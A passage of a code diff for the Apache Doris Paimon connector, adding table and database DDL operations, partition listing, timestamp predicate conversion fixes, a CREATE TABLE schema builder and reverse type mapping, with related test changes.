fe-core already pre-probes existence (via {@code getTableHandle}) and short-circuits the + * {@code IF NOT EXISTS} case, so this body has no redundant existence check — it mirrors the + * legacy {@code PaimonMetadataOps.performCreateTable}, which simply delegated to + * {@code catalog.createTable(id, schema, ignoreIfExists)}. Passing + * {@link ConnectorCreateTableRequest#isIfNotExists()} as paimon's {@code ignoreIfExists} keeps + * it idempotent: paimon no-ops when {@code ifNotExists && exists}, and throws + * {@code TableAlreadyExistException} (wrapped here as {@link DorisConnectorException}) when + * {@code !ifNotExists && exists}. + * + *

Per D7=B (legacy parity) the remote call is wrapped in + * {@link ConnectorContext#executeAuthenticated} so the FE-injected auth context (e.g. Kerberos + * UGI) applies, exactly as legacy {@code PaimonMetadataOps} wrapped every remote DDL call. + */ + @Override + public void createTable(ConnectorSession session, ConnectorCreateTableRequest request) { + Identifier id = Identifier.create(request.getDbName(), request.getTableName()); + Schema schema = PaimonSchemaBuilder.build(request); + try { + context.executeAuthenticated(() -> { + catalogOps.createTable(id, schema, request.isIfNotExists()); + return null; + }); + } catch (Exception e) { + throw new DorisConnectorException( + "Failed to create Paimon table " + id + ": " + e.getMessage(), e); + } + LOG.info("created Paimon table {}", id); + } + + /** + * Drops the Paimon table behind {@code handle}. + * + *

The SPI {@code dropTable} carries no {@code ifExists} flag and is handle-based: fe-core + * pre-resolves the handle (absent => this is never reached), so the remote drop is issued + * idempotently with {@code ignoreIfNotExists = true}, mirroring + * {@code MaxComputeConnectorMetadata.dropTable}. The remote call is wrapped in + * {@link ConnectorContext#executeAuthenticated} (D7=B legacy parity). + */ + @Override + public void dropTable(ConnectorSession session, ConnectorTableHandle handle) { + PaimonTableHandle h = (PaimonTableHandle) handle; + Identifier id = Identifier.create(h.getDatabaseName(), h.getTableName()); + try { + context.executeAuthenticated(() -> { + catalogOps.dropTable(id, true); + return null; + }); + } catch (Exception e) { + throw new DorisConnectorException( + "Failed to drop Paimon table " + id + ": " + e.getMessage(), e); + } + LOG.info("dropped Paimon table {}", id); + } + + // ==================== DDL: Create/Drop Database ==================== + + @Override + public boolean supportsCreateDatabase() { + return true; + } + + /** + * Creates a Paimon database. + * + *

fe-core already does the {@code IF NOT EXISTS} short-circuit before reaching here: since + * {@link #supportsCreateDatabase()} is true, {@code PluginDrivenExternalCatalog.createDb} + * consults BOTH the FE db-name cache AND the remote {@code databaseExists} and no-ops when the + * db already exists, so this body passes {@code ignoreIfExists = false} to the seam (mirrors + * {@code MaxComputeConnectorMetadata.createDatabase}). If the db somehow exists, paimon throws + * {@code DatabaseAlreadyExistException}, wrapped here as {@link DorisConnectorException}. + * + *

The HMS-only-props gate is a pure local arg check (no remote call), so it runs BEFORE the + * authenticator — mirroring legacy {@code PaimonMetadataOps.performCreateDb}, which rejected + * non-empty properties for every catalog type except HMS. The remote create then runs inside + * {@link ConnectorContext#executeAuthenticated} (D7=B legacy parity). + */ + @Override + public void createDatabase(ConnectorSession session, String dbName, + Map properties) { + String flavor = PaimonCatalogFactory.resolveFlavor(catalogProperties); + if (!properties.isEmpty() && !PaimonConnectorProperties.HMS.equals(flavor)) { + throw new DorisConnectorException( + "Not supported: create database with properties for paimon catalog type: " + flavor); + } + try { + context.executeAuthenticated(() -> { + catalogOps.createDatabase(dbName, /*ignoreIfExists*/ false, properties); + return null; + }); + } catch (Exception e) { + throw new DorisConnectorException( + "Failed to create Paimon database " + dbName + ": " + e.getMessage(), e); + } + LOG.info("created Paimon database {}", dbName); + } + + /** + * Drops a Paimon database, cascading to its tables when {@code force} is true. + * + *

Mirrors legacy {@code PaimonMetadataOps.performDropDb}: when {@code force}, it enumerates + * the db's tables and drops each (idempotently) BEFORE dropping the db, AND passes {@code force} + * as paimon's native cascade flag — belt-and-suspenders, exactly like legacy (NOT enumerate-only + * like MaxCompute, whose ODPS schema delete does not cascade). When {@code !force} and the db is + * non-empty, paimon's {@code dropDatabase(dbName, ifExists, cascade=false)} throws + * {@code DatabaseNotEmptyException}, wrapped here as {@link DorisConnectorException}. + * + *

The whole op (enumerate + per-table drops + db drop) is a single logical DDL op, so it runs + * under ONE {@link ConnectorContext#executeAuthenticated} scope (D7=B legacy parity). fe-core + * already short-circuits the {@code IF EXISTS} no-op when the db is absent from its cache. + */ + @Override + public void dropDatabase(ConnectorSession session, String dbName, + boolean ifExists, boolean force) { + try { + context.executeAuthenticated(() -> { + if (force) { + for (String table : catalogOps.listTables(dbName)) { + catalogOps.dropTable(Identifier.create(dbName, table), /*ignoreIfNotExists*/ true); + } + } + catalogOps.dropDatabase(dbName, ifExists, /*cascade*/ force); + return null; + }); + } catch (Exception e) { + throw new DorisConnectorException( + "Failed to drop Paimon database " + dbName + ": " + e.getMessage(), e); + } + LOG.info("dropped Paimon database {} (force={})", dbName, force); + } + + /** + * Disables pushing predicates that contain implicit CAST expressions down to Paimon. + * + *

The shared {@code ExprToConnectorExpressionConverter} unwraps CAST shells, so without this + * a predicate like {@code CAST(str_col AS INT) = 5} would be pushed to the Paimon read as the + * source-side filter {@code str_col = "5"}, which Paimon evaluates as exact equality and uses + * for file/partition pruning — dropping rows like {@code "05"}/{@code " 5"} at the source, + * which BE re-evaluation can never recover. Returning {@code false} makes + * {@code PluginDrivenScanNode.buildRemainingFilter} keep CAST-bearing conjuncts BE-only. + * Mirrors {@code MaxComputeConnectorMetadata} / {@code JdbcConnectorMetadata}. + */ + @Override + public boolean supportsCastPredicatePushdown(ConnectorSession session) { + return false; + } + @Override public Map getColumnHandles( ConnectorSession session, ConnectorTableHandle handle) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + Table table = resolveTable(paimonHandle); + RowType rowType = table.rowType(); + List fields = rowType.getFields(); + Map handles = new LinkedHashMap<>(fields.size()); + for (int i = 0; i < fields.size(); i++) { + String name = fields.get(i).name().toLowerCase(); + handles.put(name, new PaimonColumnHandle(name, i)); + } + return handles; + } + + @Override + public List listPartitionNames(ConnectorSession session, ConnectorTableHandle handle) { + List partitions = collectPartitions((PaimonTableHandle) handle); + List names = new ArrayList<>(partitions.size()); + for (ConnectorPartitionInfo partition : partitions) { + names.add(partition.getPartitionName()); + } + return names; + } + + /** + * Lists all partitions with metadata. The {@code filter} is intentionally ignored: legacy + * {@code PaimonExternalCatalog.getPaimonPartitions} returns the full partition set without + * pushing predicates into the Paimon catalog, and this preserves that behavior (mirrors + * {@code MaxComputeConnectorMetadata}). + */ + @Override + public List listPartitions(ConnectorSession session, + ConnectorTableHandle handle, Optional filter) { + return collectPartitions((PaimonTableHandle) handle); + } + + @Override + public List> listPartitionValues(ConnectorSession session, + ConnectorTableHandle handle, List partitionColumns) { + List partitions = collectPartitions((PaimonTableHandle) handle); + List> result = new ArrayList<>(partitions.size()); + for (ConnectorPartitionInfo partition : partitions) { + Map rawValues = partition.getPartitionValues(); + // Preserve the requested partitionColumns order (NOT Paimon's native spec order): + // this feeds the partition_values() TVF whose inner-list order must match the input. + List values = new ArrayList<>(partitionColumns.size()); + for (String column : partitionColumns) { + values.add(rawValues.get(column)); + } + result.add(values); + } + return result; + } + + /** + * Shared partition collector backing {@link #listPartitionNames}, {@link #listPartitions} and + * {@link #listPartitionValues}. Replicates the legacy fe-core display-name logic + * ({@code PaimonUtil.generatePartitionInfo} + {@code isLegacyPartitionName}) so the rendered + * partition names stay byte-identical to the pre-migration behavior. + */ + private List collectPartitions(PaimonTableHandle paimonHandle) { + List partitionKeys = paimonHandle.getPartitionKeys(); + // Legacy never lists partitions for unpartitioned tables: PaimonPartitionInfoLoader.load + // returns EMPTY when partitionColumns is empty, so guard before touching the seam. + if (partitionKeys == null || partitionKeys.isEmpty()) { + return Collections.emptyList(); + } + + Table table = resolveTable(paimonHandle); + Identifier identifier = Identifier.create( + paimonHandle.getDatabaseName(), paimonHandle.getTableName()); + List paimonPartitions; + try { + paimonPartitions = catalogOps.listPartitions(identifier); + } catch (Catalog.TableNotExistException e) { + // Legacy getPaimonPartitions swallows TableNotExistException and returns empty. + LOG.warn("Paimon table not found while listing partitions: {}", identifier, e); + return Collections.emptyList(); + } + + boolean legacyName = Boolean.parseBoolean( + table.options().getOrDefault("partition.legacy-name", "true")); + + // Connector cannot import Doris Type: detect DATE partition columns straight from the + // Paimon RowType (DataTypeRoot.DATE) instead of the legacy columnNameToType.isDateV2(). + Set partitionKeyNames = new HashSet<>(partitionKeys); + Set dateColumns = new HashSet<>(); + for (DataField field : table.rowType().getFields()) { + if (partitionKeyNames.contains(field.name()) + && field.type().getTypeRoot() == DataTypeRoot.DATE) { + dateColumns.add(field.name()); + } + } + + List result = new ArrayList<>(paimonPartitions.size()); + for (Partition partition : paimonPartitions) { + Map spec = partition.spec(); + StringBuilder sb = new StringBuilder(); + for (Map.Entry entry : spec.entrySet()) { + sb.append(entry.getKey()).append("="); + // When partition.legacy-name = true (default), Paimon stores DATE as days since + // 1970-01-01 (epoch integer), so render it via the Paimon SDK formatDate; when + // false the value is already a human-readable date string. + if (legacyName && dateColumns.contains(entry.getKey())) { + sb.append(DateTimeUtils.formatDate(Integer.parseInt(entry.getValue()))).append("/"); + } else { + sb.append(entry.getValue()).append("/"); + } + } + if (sb.length() > 0) { + sb.deleteCharAt(sb.length() - 1); + } + String partitionName = sb.toString(); + // partitionValues = RAW spec (un-rendered): downstream indexes by raw remote keys. + result.add(new ConnectorPartitionInfo( + partitionName, + spec, + Collections.emptyMap(), + partition.recordCount(), + partition.fileSizeInBytes(), + partition.lastFileCreationTime())); + } + return result; + } + + /** + * Resolves the live {@link Table} for a handle: prefer the transient reference, else re-load + * from the catalog seam. Mirrors the reload fallback originally inlined in + * {@link #getColumnHandles}. + */ + private Table resolveTable(PaimonTableHandle paimonHandle) { Table table = paimonHandle.getPaimonTable(); if (table == null) { // Fallback: re-load from catalog @@ -169,14 +468,7 @@ public Map getColumnHandles( throw new RuntimeException("Failed to load Paimon table: " + id, e); } } - RowType rowType = table.rowType(); - List fields = rowType.getFields(); - Map handles = new LinkedHashMap<>(fields.size()); - for (int i = 0; i < fields.size(); i++) { - String name = fields.get(i).name().toLowerCase(); - handles.put(name, new PaimonColumnHandle(name, i)); - } - return handles; + return table; } private List mapFields(RowType rowType, List primaryKeys) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonPredicateConverter.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonPredicateConverter.java index 93d7cfbfe9a58b..16f0a1df934f32 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonPredicateConverter.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonPredicateConverter.java @@ -278,13 +278,23 @@ private Object convertLiteralValue(ConnectorLiteral literal, DataType paimonType } return null; case TIMESTAMP_WITHOUT_TIME_ZONE: - case TIMESTAMP_WITH_LOCAL_TIME_ZONE: + // Zone-free type: interpret the literal's wall-clock in UTC to match paimon's + // stored min/max file/partition stats (computed by reading the wall clock as UTC). + // Mirrors legacy PaimonValueConverter#visit(TimestampType), which uses a fixed + // GMT Calendar. Using the session zone here would shift the epoch-millis vs the + // stored stats and risk false file/partition pruning = silent data loss. if (value instanceof LocalDateTime) { LocalDateTime dt = (LocalDateTime) value; long millis = dt.toInstant(ZoneOffset.UTC).toEpochMilli(); return Timestamp.fromEpochMillis(millis); } return null; + case TIMESTAMP_WITH_LOCAL_TIME_ZONE: + // Do NOT push: legacy never pushed LTZ predicates (PaimonValueConverter has no + // visit(LocalZonedTimestampType), so it fell to defaultMethod -> null). Pushing + // via a fixed zone is an instant mismatch under non-UTC sessions; leave LTZ + // conjuncts to BE-side filtering (this conjunct is cleanly dropped). + return null; default: return null; } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index d850cdc5f948cf..6eb2964d8fb84c 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -30,6 +30,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.apache.paimon.CoreOptions; +import org.apache.paimon.catalog.Identifier; import org.apache.paimon.data.BinaryRow; import org.apache.paimon.io.DataFileMeta; import org.apache.paimon.table.FileStoreTable; @@ -67,6 +68,22 @@ *

  • COUNT pushdown: When the query is COUNT(*) and the split has * pre-computed merged row count.
  • * + * + *

    Partition pruning (P5-T09): pure predicate pushdown. Only the 4-arg + * {@link #planScan} is overridden; the engine's 6-arg {@code planScan(..., requiredPartitions)} + * (the Nereids-pruned partition set) is intentionally NOT overridden. Paimon prunes partitions + * and data files internally: the Doris filter is converted by + * {@link PaimonPredicateConverter} and pushed via {@code ReadBuilder.withFilter}, and the Paimon + * SDK's {@code newScan().plan().splits()} eliminates non-matching partitions/files from those + * predicates. Partition columns are ordinary columns in Paimon's {@code RowType}, so a partition + * predicate is just another pushed predicate. This differs from MaxCompute (whose ODPS read + * session needs explicit {@code PartitionSpec}s and therefore consumes {@code requiredPartitions}); + * for Paimon the engine set would be redundant with the predicate it already pushes. The SPI + * default chain (6-arg → 5-arg → 4-arg) routes correctly with {@code requiredPartitions} + * dropped. Consequence: FE EXPLAIN shows {@code partition=0/0} (no engine-level partition count) + * because the FE currently treats Paimon tables as non-partitioned; that is a known display gap + * tracked with the {@code partition_columns} wiring deferred to a later batch (B5), and does not + * affect read-row correctness. */ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { @@ -79,9 +96,35 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { new TypeReference>() {}; private final Map properties; + private final PaimonCatalogOps catalogOps; - public PaimonScanPlanProvider(Map properties) { + public PaimonScanPlanProvider(Map properties, PaimonCatalogOps catalogOps) { this.properties = properties; + this.catalogOps = catalogOps; + } + + /** + * Returns the handle's transient Paimon {@link Table}, reloading it from the catalog seam + * when the transient reference is null (e.g. after a serialization round-trip across the + * FE/BE boundary or plan reuse). Byte-identical to the reload fallback in + * {@link PaimonConnectorMetadata#getColumnHandles}. Package-private for direct unit testing. + * + *

    NOTE: the reloaded Table may come from a different {@link org.apache.paimon.catalog.Catalog} + * instance than the one that produced the handle. That is acceptable for this fallback safety + * net (it is not snapshot-consistent with the handle's originating catalog). + */ + Table resolveTable(PaimonTableHandle paimonHandle) { + Table table = paimonHandle.getPaimonTable(); + if (table == null) { + Identifier id = Identifier.create( + paimonHandle.getDatabaseName(), paimonHandle.getTableName()); + try { + table = catalogOps.getTable(id); + } catch (Exception e) { + throw new RuntimeException("Failed to load Paimon table: " + id, e); + } + } + return table; } @Override @@ -92,7 +135,7 @@ public List planScan( Optional filter) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; - Table table = paimonHandle.getPaimonTable(); + Table table = resolveTable(paimonHandle); // Build predicates from filter expression RowType rowType = table.rowType(); @@ -201,7 +244,7 @@ public Map getScanNodeProperties( Optional filter) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; - Table table = paimonHandle.getPaimonTable(); + Table table = resolveTable(paimonHandle); Map props = new LinkedHashMap<>(); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaBuilder.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaBuilder.java new file mode 100644 index 00000000000000..ecad78be175c14 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaBuilder.java @@ -0,0 +1,140 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.ddl.ConnectorPartitionField; +import org.apache.doris.connector.api.ddl.ConnectorPartitionSpec; + +import org.apache.paimon.CoreOptions; +import org.apache.paimon.schema.Schema; + +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.stream.Collectors; + +/** + * Builds a Paimon {@link Schema} from a connector-SPI + * {@link ConnectorCreateTableRequest}. + * + *

    Functional port of the legacy fe-core + * {@code PaimonMetadataOps.toPaimonSchema}: primary keys come from + * {@code properties["primary-key"]}, partition keys come from the + * {@link ConnectorPartitionSpec} (identity transforms only), {@code "primary-key"} and + * {@code "comment"} are stripped from the option map, and {@code "location"} is re-keyed + * to {@link CoreOptions#PATH}. Bucket / distribution info is intentionally NOT consumed — + * legacy paimon ignored bucketSpec and let any {@code bucket} option ride through + * unchanged as a passthrough option.

    + * + *

    Two deliberate, safer divergences from the legacy bytes (each documented + tested at + * its call site): the table comment falls back to {@link ConnectorCreateTableRequest#getComment()} + * (the {@code COMMENT} clause) when {@code properties["comment"]} is absent — legacy read only + * the property and silently dropped the clause; and blank primary-key tokens are filtered out — + * legacy would have forwarded an empty name that Paimon rejects downstream.

    + */ +public final class PaimonSchemaBuilder { + + private static final String PRIMARY_KEY_IDENTIFIER = "primary-key"; + private static final String PROP_COMMENT = "comment"; + private static final String PROP_LOCATION = "location"; + private static final String IDENTITY_TRANSFORM = "identity"; + + private PaimonSchemaBuilder() { + } + + /** + * Convert a CREATE TABLE request into a Paimon {@link Schema}. + * + * @throws DorisConnectorException if a partition field uses a non-identity transform + * or a column type cannot be represented in Paimon + */ + public static Schema build(ConnectorCreateTableRequest request) { + Map properties = request.getProperties(); + + // primary keys: from properties["primary-key"] only (no dedicated request field), + // split on comma, trimmed, blanks dropped. Mirrors legacy toPaimonSchema. + String pkAsString = properties.get(PRIMARY_KEY_IDENTIFIER); + List primaryKeys = pkAsString == null + ? Collections.emptyList() + : Arrays.stream(pkAsString.split(",")) + .map(String::trim) + .filter(s -> !s.isEmpty()) + .collect(Collectors.toList()); + + List partitionKeys = partitionKeys(request.getPartitionSpec()); + + // options normalization: drop primary-key/comment, re-key location -> CoreOptions.PATH. + Map normalizedOptions = new HashMap<>(properties); + normalizedOptions.remove(PRIMARY_KEY_IDENTIFIER); + normalizedOptions.remove(PROP_COMMENT); + if (normalizedOptions.containsKey(PROP_LOCATION)) { + String path = normalizedOptions.remove(PROP_LOCATION); + normalizedOptions.put(CoreOptions.PATH.key(), path); + } + + // comment resolution: legacy toPaimonSchema read ONLY properties["comment"] (the nereids + // PROPERTIES("comment"=...) map); the dedicated COMMENT clause never reached it. The SPI + // converter (CreateTableInfoToConnectorRequestConverter.convert) sets request.getComment() + // from CreateTableInfo.getComment() (the COMMENT clause) and request.getProperties() from + // CreateTableInfo.getProperties() (the PROPERTIES map) — two distinct nereids fields. + // Resolution: properties["comment"] wins (preserves legacy persisted-comment behavior), + // else fall back to request.getComment() so a user's COMMENT clause is not silently dropped. + String comment = properties.containsKey(PROP_COMMENT) + ? properties.get(PROP_COMMENT) + : request.getComment(); + + Schema.Builder builder = Schema.newBuilder() + .options(normalizedOptions) + .primaryKey(primaryKeys) + .partitionKeys(partitionKeys) + .comment(comment); + for (ConnectorColumn col : request.getColumns()) { + // Column-level nullability applied here via copy(nullable), mirroring legacy + // toPaimonSchema's toPaimontype(type).copy(field.getContainsNull()). + builder.column(col.getName(), + PaimonTypeMapping.toPaimonType(col.getType()).copy(col.isNullable()), + col.getComment()); + } + return builder.build(); + } + + private static List partitionKeys(ConnectorPartitionSpec spec) { + if (spec == null) { + return Collections.emptyList(); + } + List keys = new ArrayList<>(spec.getFields().size()); + for (ConnectorPartitionField field : spec.getFields()) { + String transform = field.getTransform(); + // Paimon legacy only supported plain (identity) partition columns. Guard mirrors + // MaxComputeConnectorMetadata.identityPartitionColumns. transform is @NonNull on + // ConnectorPartitionField, so only the value matters. + if (transform != null && !IDENTITY_TRANSFORM.equalsIgnoreCase(transform)) { + throw new DorisConnectorException( + "Paimon only supports identity partition columns, got transform: " + transform); + } + keys.add(field.getColumnName()); + } + return keys; + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java index 6e47e26ca0d73f..72caf7a76aed83 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java @@ -18,22 +18,32 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; import org.apache.paimon.types.ArrayType; +import org.apache.paimon.types.BigIntType; import org.apache.paimon.types.BinaryType; +import org.apache.paimon.types.BooleanType; import org.apache.paimon.types.CharType; import org.apache.paimon.types.DataField; import org.apache.paimon.types.DataType; +import org.apache.paimon.types.DateType; import org.apache.paimon.types.DecimalType; +import org.apache.paimon.types.DoubleType; +import org.apache.paimon.types.FloatType; +import org.apache.paimon.types.IntType; import org.apache.paimon.types.LocalZonedTimestampType; import org.apache.paimon.types.MapType; import org.apache.paimon.types.RowType; import org.apache.paimon.types.TimestampType; import org.apache.paimon.types.VarBinaryType; import org.apache.paimon.types.VarCharType; +import org.apache.paimon.types.VariantType; import java.util.ArrayList; import java.util.List; +import java.util.Locale; +import java.util.concurrent.atomic.AtomicInteger; import java.util.stream.Collectors; /** @@ -177,6 +187,95 @@ private static ConnectorType toStructType(RowType rowType, Options options) { return ConnectorType.structOf(names, types); } + /** + * Convert a Doris {@link ConnectorType} (as produced by the CREATE TABLE request path) + * to a Paimon {@link DataType}. + * + *

    This is the faithful reverse of the legacy fe-core + * {@code DorisToPaimonTypeVisitor}: the scalar set is intentionally narrow (it mirrors + * the visitor's {@code atomic} branches and NOT MaxCompute's richer set), CHAR/VARCHAR/STRING + * all collapse to {@code VarChar(MAX)} (declared length dropped), DATETIME/DATETIMEV2 map to a + * plain {@code TimestampType()} (scale dropped), and the MAP key is forced non-null. Types the + * legacy visitor did not handle (TINYINT, SMALLINT, LARGEINT, TIME, IPV4/6, JSON, ...) throw, + * preserving the legacy gap.

    + * + *

    The returned type carries Paimon's default (nullable) flag; column-level nullability is + * applied by the caller via {@code .copy(nullable)} (mirroring legacy + * {@code PaimonMetadataOps.toPaimonSchema}). The map-key {@code .copy(false)} below is part of + * the type structure (not column nullability) and is kept.

    + * + * @throws DorisConnectorException if the type cannot be represented in Paimon + */ + public static DataType toPaimonType(ConnectorType type) { + String name = type.getTypeName().toUpperCase(Locale.ROOT); + switch (name) { + case "BOOLEAN": + return new BooleanType(); + case "INT": + case "INTEGER": + return new IntType(); + case "BIGINT": + return new BigIntType(); + case "FLOAT": + return new FloatType(); + case "DOUBLE": + return new DoubleType(); + case "CHAR": + case "VARCHAR": + case "STRING": + // Legacy parity: all char-family types collapse to VarChar(MAX); declared + // length is intentionally dropped (DorisToPaimonTypeVisitor.atomic isCharFamily). + return new VarCharType(VarCharType.MAX_LENGTH); + case "DATE": + case "DATEV2": + return new DateType(); + case "DECIMALV2": + case "DECIMALV3": + case "DECIMAL32": + case "DECIMAL64": + case "DECIMAL128": + case "DECIMAL256": + return new DecimalType(type.getPrecision(), type.getScale()); + case "DATETIME": + case "DATETIMEV2": + // Legacy parity: no-arg TimestampType (precision defaults to 6); the datetime + // scale is intentionally dropped to match DorisToPaimonTypeVisitor.atomic, and it + // is a plain timestamp (NOT LocalZonedTimestampType). + return new TimestampType(); + case "VARBINARY": + return new VarBinaryType(VarBinaryType.MAX_LENGTH); + case "VARIANT": + return new VariantType(); + case "ARRAY": + return new ArrayType(toPaimonType(type.getChildren().get(0))); + case "MAP": + // Legacy forces the map key non-null via .copy(false). + return new MapType( + toPaimonType(type.getChildren().get(0)).copy(false), + toPaimonType(type.getChildren().get(1))); + case "STRUCT": + case "ROW": + return toPaimonRowType(type); + default: + throw new DorisConnectorException( + "Unsupported type for Paimon: " + type.getTypeName()); + } + } + + private static DataType toPaimonRowType(ConnectorType type) { + List children = type.getChildren(); + List names = type.getFieldNames(); + List fields = new ArrayList<>(children.size()); + // Legacy uses new AtomicInteger(-1).incrementAndGet() -> sequential ids 0,1,2,... + AtomicInteger fieldId = new AtomicInteger(-1); + for (int i = 0; i < children.size(); i++) { + String fieldName = i < names.size() && names.get(i) != null ? names.get(i) : "col" + i; + fields.add(new DataField( + fieldId.incrementAndGet(), fieldName, toPaimonType(children.get(i)))); + } + return new RowType(fields); + } + /** * Type mapping options. */ diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java index d09e048eecac52..6ece0251d35689 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java @@ -32,6 +32,7 @@ import org.apache.paimon.utils.SimpleFileReader; import java.time.Duration; +import java.util.Collections; import java.util.List; import java.util.Map; import java.util.Optional; @@ -39,12 +40,17 @@ /** * Minimal offline {@link Table} double for unit tests. Only the metadata read calls that * {@link PaimonConnectorMetadata} actually exercises — {@link #rowType()}, - * {@link #partitionKeys()}, {@link #primaryKeys()} — return controlled values; every other - * method throws {@link UnsupportedOperationException}. + * {@link #partitionKeys()}, {@link #primaryKeys()}, {@link #options()} — return controlled + * values; every other method throws {@link UnsupportedOperationException}. * *

    Throwing on the rest is deliberate: it documents that the metadata read path must touch * nothing else, and a future change that starts depending on (say) {@code newReadBuilder()} in * the read-only metadata path would blow up loudly in the test instead of silently passing. + * + *

    P5-T08 promoted {@link #options()} out of the throwing set: the partition-listing path + * reads the {@code partition.legacy-name} option, so {@code options()} now returns a + * configurable map (default empty, settable via {@link #setOptions(Map)}). Every other method + * keeps the fail-loud contract. */ final class FakePaimonTable implements Table { @@ -52,6 +58,7 @@ final class FakePaimonTable implements Table { private final RowType rowType; private final List partitionKeys; private final List primaryKeys; + private Map options = Collections.emptyMap(); FakePaimonTable(String name, RowType rowType, List partitionKeys, List primaryKeys) { @@ -61,6 +68,11 @@ final class FakePaimonTable implements Table { this.primaryKeys = primaryKeys; } + /** Configures the value returned by {@link #options()}. */ + void setOptions(Map options) { + this.options = options; + } + @Override public String name() { return name; @@ -85,7 +97,7 @@ public List primaryKeys() { @Override public Map options() { - throw new UnsupportedOperationException(); + return options; } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDbDdlTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDbDdlTest.java new file mode 100644 index 00000000000000..846b71818095d2 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDbDdlTest.java @@ -0,0 +1,271 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.DorisConnectorException; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +/** + * T14 database-DDL tests for {@link PaimonConnectorMetadata#supportsCreateDatabase}, + * {@link #createDatabase} and the 4-arg {@link #dropDatabase}, pinning: + * (1) the HMS-only-props gate runs as a pure local arg check BEFORE the authenticator, + * (2) raw paimon checked exceptions are wrapped as {@link DorisConnectorException}, + * (3) D7=B: every remote call runs INSIDE + * {@link org.apache.doris.connector.spi.ConnectorContext#executeAuthenticated}, and + * (4) the force-drop enumerate-loop + native cascade (legacy parity with + * {@code PaimonMetadataOps.performDropDb}). + * + *

